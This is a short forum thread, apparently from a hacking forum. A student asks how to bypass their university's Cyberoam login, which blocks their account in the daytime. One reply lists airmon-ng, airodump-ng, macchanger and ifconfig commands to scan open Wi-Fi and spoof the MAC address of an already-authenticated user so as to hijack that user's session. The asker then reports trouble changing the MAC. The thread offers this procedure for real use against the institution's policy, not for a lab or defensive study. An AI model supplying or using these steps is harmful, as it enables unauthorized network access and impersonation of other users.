Cyberoam authentical bypass

Our University gives access to the internet at night time.

In the day time, they block our username ( not allow to log in at this time).

So, anyone how to bypass this authentical?Capture

@rckanta

  • Put your Wifi card into monitor mode.
    airmon-ng start wlan0

  • Scan for your target network.
    airodump-ng wlan0mon --encrypt OPN
    Sort by channel and connected machines.
    airodump-ng wlan0mon -c 5 --encrypt OPN -a

  • Go back into Non monitor mode and spoof the mac address of machine connected to the router.
    airmon-ng stop wlan0mon
    ifconfig wlan0 down
    macchanger -m SpoofedMac wlan0
    ifconfig wlan0 up

That should do the trick. Essentially you are using an session that has already been authenticated by spoofing your mac address to a user that is connected to the device and already authenticated.

4 Likes

I can not change the mac address of wlan0.

I am using Parrot os

@rckanta Why can you not change it? Are you getting errors? What commands have you issued to change your mac?

I got this error : https://forum.hackersploit.org/t/why-cant-i-change-my-mac-address/134